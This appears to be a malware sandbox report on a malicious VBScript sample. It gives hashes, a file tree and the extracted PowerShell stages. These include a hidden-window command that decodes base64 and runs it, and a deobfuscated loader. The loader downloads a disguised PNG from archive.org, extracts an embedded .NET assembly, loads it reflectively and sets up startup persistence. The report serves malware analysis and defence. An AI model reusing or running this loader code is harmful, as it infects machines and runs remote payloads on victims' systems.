Malicious
Malicious

0115673692826a6b6bb757b9819b0b1f

VBScript
|
MD5: 0115673692826a6b6bb757b9819b0b1f
|
Size: 78.92 KB
|
text/vbscript

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
0115673692826a6b6bb757b9819b0b1f
Sha1
d154e062ef0aa0cf01081526f2fbc7d67069c19c
Sha256
ddb6dc98283c5ce029fc0d34009b6a284df76cf81f9de895872277ebfb0355e7
Sha384
930dfcbe12b11d9cb3f5020f77d2e99909630d4bbe04c3aa64ad2df837e466218b2174e0002c6eb4ac438a36cd36b4e1
Sha512
b04fff1987034b21dc4f2b40b10d05bde4a5173968738a2c7a41017d774a7e874122ab2c3ace0b1cc429c3d8e7c3760fd6994813c16b06f6b938844cdcbdaf10
SSDeep
1536:Xnj2u+Mx325YpEH64WLrd1v46sy46qBhEAZ+kh9vgI:iu+I++kTvgI
TLSH
2973A2E731936478896B08DEC9EC39F209D513394ADA95ED97E40DE30EF99C44021EEE
File Structure
0115673692826a6b6bb757b9819b0b1f
Malicious
0115673692826a6b6bb757b9819b0b1f.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
Artefacts
Name
 Value
URLs in VB Code - #1

http://www.ostrosoft.com/smtp.html
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnMGhIZHVjV2FoSldadFZXYmwxMmJqOXlNekVqTHpRak11VXpOeDR5TndFekx2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnSW5zdGFsbFV0aWwnLCcnLCdJbnN0YWxsVXRpbCcsJycsJ1VSTCcsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression"
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnMGhIZHVjV2FoSldadFZXYmwxMmJqOXlNekVqTHpRak11VXpOeDR5TndFekx2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnSW5zdGFsbFV0aWwnLCcnLCdJbnN0YWxsVXRpbCcsJycsJ1VSTCcsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression"
Deobfuscated PowerShell

Invoke-Expression
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHducWahJWZtVWbl12bj9yMzEjLzQjMuUzNx4yNwEzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "InstallUtil", "", "InstallUtil", "", "URL", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } ))
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHducWahJWZtVWbl12bj9yMzEjLzQjMuUzNx4yNwEzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "InstallUtil", "", "InstallUtil", "", "URL", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } ))
Deobfuscated PowerShell

Invoke-Expression
Deobfuscated PowerShell

Invoke-Expression
0115673692826a6b6bb757b9819b0b1f (78.92 KB)
File Structure
0115673692826a6b6bb757b9819b0b1f
Malicious
0115673692826a6b6bb757b9819b0b1f.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
URLs in VB Code - #1

http://www.ostrosoft.com/smtp.html

0115673692826a6b6bb757b9819b0b1f
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnMGhIZHVjV2FoSldadFZXYmwxMmJqOXlNekVqTHpRak11VXpOeDR5TndFekx2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnSW5zdGFsbFV0aWwnLCcnLCdJbnN0YWxsVXRpbCcsJycsJ1VSTCcsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression"

Malicious

0115673692826a6b6bb757b9819b0b1f > 0115673692826a6b6bb757b9819b0b1f.deobfuscated.vbs > [Command #0]

Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnMGhIZHVjV2FoSldadFZXYmwxMmJqOXlNekVqTHpRak11VXpOeDR5TndFekx2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnSW5zdGFsbFV0aWwnLCcnLCdJbnN0YWxsVXRpbCcsJycsJ1VSTCcsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression"

Malicious

0115673692826a6b6bb757b9819b0b1f > 0115673692826a6b6bb757b9819b0b1f.deobfuscated.vbs > [Command #0] > [Deobfuscated PS]
Deobfuscated PowerShell

Invoke-Expression

Malicious

0115673692826a6b6bb757b9819b0b1f > 0115673692826a6b6bb757b9819b0b1f.deobfuscated.vbs > [Command #0] > [PowerShell Command]
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHducWahJWZtVWbl12bj9yMzEjLzQjMuUzNx4yNwEzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "InstallUtil", "", "InstallUtil", "", "URL", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } ))

Malicious

0115673692826a6b6bb757b9819b0b1f > 0115673692826a6b6bb757b9819b0b1f.deobfuscated.vbs > [Command #0] > [Base64-Block]
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHducWahJWZtVWbl12bj9yMzEjLzQjMuUzNx4yNwEzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "InstallUtil", "", "InstallUtil", "", "URL", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } ))

Malicious

0115673692826a6b6bb757b9819b0b1f > 0115673692826a6b6bb757b9819b0b1f.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS]
Deobfuscated PowerShell

Invoke-Expression

Malicious

0115673692826a6b6bb757b9819b0b1f > 0115673692826a6b6bb757b9819b0b1f.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command]
Deobfuscated PowerShell

Invoke-Expression

Malicious

0115673692826a6b6bb757b9819b0b1f > 0115673692826a6b6bb757b9819b0b1f.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙